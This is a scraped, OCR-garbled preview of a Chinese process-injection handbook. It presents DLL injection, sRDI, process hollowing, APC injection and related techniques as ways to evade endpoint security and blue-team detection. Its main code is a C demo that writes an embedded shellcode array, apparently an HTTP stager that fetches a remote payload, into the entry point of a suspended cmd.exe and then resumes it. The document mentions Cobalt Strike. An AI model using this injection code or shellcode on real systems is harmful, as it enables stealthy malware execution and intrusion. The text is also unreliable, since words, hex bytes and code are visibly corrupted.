2024进程注入技术手册.docx

《2024进程注入技术手册.docx》由会员分享，可在线阅读，更多相关《2024进程注入技术手册.docx（66页珍藏版）》请在课桌文档上搜索。

1、进程注入技术手册目录D1.1.注入经典D1.1.注入注入方法例子反射D1.1.注实现方法例子SheIleOde反射D1.1.注入(sRDl)PE注入在远程进程中执行Shellcode没有VirtUalAIIOCEXRWX的AddreSSOfEntryPOint代码注入注入方法DemoPROCESSHO1.1.OWING(RunPE)注入方法ProcessDoppelganging注入方法线程执行劫持注入方法完整DnIeO例子从PE资源加教和执行Shellcode注入方法DemoAPC队列代码注入注入方法DemoAPC队列代码注入变种SetWindowHookEx注入DemoNtCreateSe

2、ction+NtMapViewfSection代码注入注入方法DemoModuleStomping注入方法DenIo案例分享后记进程注入是一种常用来绕过总端安全软件和蓝队排查的手法,在无文件落地和恶意软件攻击中的都是常用的手法。在另一个进程的地址空间内运行自定义代码。进程注入提高了隐身性,一些技术还实现了持久性。D1.1.注入经典D1.1.注入通过创建者远程线程和加载库的D1.1.注入是把ShHICOde注入另一个进程的常用技术在攻击中我们可以将其恶意动态链接库(D1.1.)的路径写入另一个进程的虚拟地址空间中，并通过在目标进程中创建远程线程来确保远程进程加载它。D1.1.注入是将代码注入至卜

3、个远程进程中,并让远程进程调用1.oad1.ibrary()函数从而强制远程进程加载一个D1.1.程序到进程中。而当D1.1.被加载时就会运行D1.1.中的DllMain()函数,所以就会为代码执行提供机会,而因为D1.1.本身是由感染后的进程加载的同时PE文件也并没有对系统进行过多的敏感操作所以这种技术具有相当强的一种隐蔽性。C1.ASSICD1.1.INJECTIONTARGETPROCESSMA1.WAREPROCESSSinwinoucivalwMr*N!M.11hMln4ta如果要加载ShelICOd6在dll中定义就行POC:WOTWWOWS!MeCMyMMSUrtoeUaR2nV

4、ll11WMMCRMMShellCode反射D1.1.注入(sRDI)Shellcode反射D1.1.注入(sRDI)是一种技术,它允许将给定的D1.1.转换为位置无关的shellcode，然后可以使用任意ShelICode注入和执行技术注入该ShelICod&相对于标准RDI使用SRDI的一些优点：可以转换任何D1.1.为无位置依赖的ShelICode并且可以使用标准的ShellCode注入技术来使用它。1.1.中不需要写任何反射加载器代码,因为反射加载器是在D1.1.外部的ShellCOde中实现的。合理使用权限，没有大量的RWX权限数据。还可以根据选项,抹掉PE头特征。SRDl的所有功能

5、基于以下两个组件：-个C语言项目,可将PE1.oader编译为Shellcode转换代码负责将D1.1.、RDI和用户数据进行绑定由以下文件组成：SheIIcodeRDI：编译D1.1.加载器的ShellcodeNative1.oader:需要时,将D1.1.转换为shellcode然后注入内存DotNet1.oader：Native1.oader的C#实现pythonConvertToSheIIcode.Py:将D1.1.转换为shellcodePythonEncodeBIobs.py：对已编译的SRDI进行编码,进行静态嵌入PowerSheIIConvertTo-Shellcode.ps!

6、:将D1.1.转换为ShellCodeFunctionTest:导入sRDI的C函数进行调试测试TestD1.1.:示例D1.1.,包括两个导出函数,用于后续的加载和调用D1.1.不需要使用RDI进行编译,但是该技术具有交叉兼容性。POWerShelI导入194PSC:Uers111eDesktopfiASM)XjA%R0I-masterslU)I-MaiterPcwerSe1)Import-Module.COnvertTo-Shel!code.pla编写D1.1.DemoCrmtvFroeMiA(N1.1,)*ftot*pd.et*Botd.eeMU_M_1.1.TRIE0.MUwMI1.,

7、ivpi);br:CMeBUnMAlMTTAaI:CM*Otln*EDDT!:caseB1.1.PfOOSSDCTACM:break;CamwrtTo-SkwIlodvC:Utrlllal(tUItDIV1RDl-Mtter0etMMTestDII11方便后面利用,我们转化为16进制把ShelICOde保存转为C的SheIlCOdeMtavfMWindow*Ser_.*.MvtMcclHCHClwlsrHCHCHC那么通过设置RW的权限可以防止杀毒软件和EDR重点关注。注入方法言动一个目标进程shellcode将被注入到该进程中处于挂起状态。AddreSSOfEntryPoint获取目标进程写

8、入ShellCOde恢复目标进程Demo/#includepch.h#includeinclude#include#pragmacomment(lib,ntdl,)intmain()(/86shellcodeunsignedcharshellcode=11xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb74ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx4

9、0x7885xc0x74x4ax01xd0x50x8b48x18x8bx5820x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx2475xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xfxe0x58x5x5ax8bx12xeb86x5d68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xf

10、fxd5xe8x00x00x00x00x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9xa4x00x00x00x5b31xc9x51x51x6ax03x51x51x68xbbx01x00x00x53x50x68x5Ax89x9xc6xffxd5x50xe9x8cx00x00x00x5bx31xd2x52x68x00x32xc0x84x52x52x52x53x52x50x68xebx552ex3bxffxd5x89xc6x83xc350x68x80x33x00x00x89xe0x6ax04x50x6ax1x56x68x75x46x9ex86xfxd5x5

11、x31xfx57x5Ax6axffx53x56x68x2dx06x187bxffxd5x85xc0x0fx84xcax01x00x00x31xffx85xf6x74xO4x89xf9xebxO9x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x5xe0x0bxfxd5xbx00x2f00x00x39xc7x75x07x58x50xe9x7bxffxffxffx31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x6xffxffxffx2fx7x75x65x2ex6

12、dx69x6ex2e6ax73x00xd4xax8ax64x1fxb8x69x90xf5xfcxbfx6cxc3xecx52xe0x11x0ex4axbdxacxf7xcaxfbx7ax49x63x07x1cxa9x9cxcb04x17x37xafx96x11xbcxd7xebx2fxebx85x18x44x5dx91xa3x0cx7dx64x2exb7xfexccxc2x74xb8x5bxe8xdex56x55x23xd2x9dx00x41x63x63x65x70x74x3ax20x2ax2x2ax0dx0ax43x6fx6ex74x65x6ex74x2dx4cx61x6ex6x75x61x

13、67x65x3ax20x64x69x76x2dx4dx56x20x44x68x69x76x6568x69x0dx0ax55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6x7ax69x6cx6cx61x2x35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3b20x4dx53x49x45x20x38x2e30x3bx20x57x69x6ex64x6x77x73x20x4ex54x20x36x2ex31x3bx2054x72x69x64x65x6ex74x2fx35x2ex30x29x0dx0ax00xd6xf0xe9x27xc

14、0x94xefx1cxe5x21xfaxbcx2bx93x6cx56x30x0dx74x20x05x7cx17x6664xb1xfcx70x71xa6x18xcbxb4xfex58x21x58xc4xf8x3fxf6x76x01x44x95x94x59x7dx0fx54x79xbbx2b9ex2x54xe1x2Ax10x43xb2xeex7995xacx80x9bx50xd0xa2xd9x74xa0x1dx32x55x2dx82x23x69xa1x2fx13x12x5cxe1x2bxdex32x07xa2x6100x28x94x9bx10x8fxebxc2xe7xe1x66x11xacx1Ax

15、73x4bx32xc0x4fx53x5bx56x99x76x9axc4xfdx14x71xcfx55xa6xe4x70x2axe0x20x57x5bxf3x63xd7xd3x1ex00x98x9dxd5x0ax28xbax5x6dx4bx04xdex8x86x1axb2x92x71x75x27x54xc4x3ax42x11xdbx1axeexb8xbdx0450x3bx4dx0ax87xc9x18x9fxacxa1xc3x00x68xf0xb5xa2x56xffxd5xax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb

16、9x00x00x0000x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx0Ax01xc3x85xc0x75xe5x58xc3xe8x89xfdxffxfx63x6ex2ex61x70x69x2ex63x68x69x6ex61x64x64x2ex63x6ex00x51x09xbfx6d;Startupinfoasi；si=;ProcessjnformationPi=；PR0CESS_BASIC_INF0RMATI0Npbi=;DWORDretur1.ength=O;CreateProce

17、ssA(0,(1.PSTR)c:windowssystem32cmd.exe,O,O,O,CREATE_SUSPENDED,O,O,&si,&pi);获取目标映像PEB地址和指向映像库的指针NtQuerylnformationProcess(pi.hProcess,ProcessBasicInformation,&pbi,sizeof(PROCESS_BASIC_INFORMATION),&return1.ength);DWORDPeboffset=(DWORD)Pbi.PebBaseAddress+8;/获取目标进程映像基址1.PVOIDimageBase=0;ReadProcessMemo

18、ry(pi.hProcess,(1.PCVOID)pebOffset,&imageBase,4,NU1.1.);/读取目标进程映像头BYTEheadersBuffer4096=;ReadProcessMemory(pi.hProcess,(1.PCVOID)ImageBase,headersBuffer,4096,NU1.1.);/获取入口点的地址PIMAGE_DOS_HEADERdosHeader=(PIMAGE_DOS_HEADER)headersBuffer;PIMAGE_NT_HEADERSntHeader=(PIMAGE_NT_HEADERS)(DWORD-PTR)headersBu

19、ffer+dosHeader-eJfanew);1.PVOIDCodeEntry=(1.PVOID)(ntHeader-OptionalHeader.AddressOfEntryPoint+(DWORD)ImageBase);将ShelICode写入图像人点并执行它WriteProcessMemory(pi.hProcess,CodeEntry,shellcode,Sizeof(SheIIcode),NU1.1.);ResumeThread(pi.hThread);returnO;)但是好像只能注入32位的进程。M911C*n11ZPf(VMtf4Osue*MMMyt在CObaltStrike中PROCESSHO1.1.OW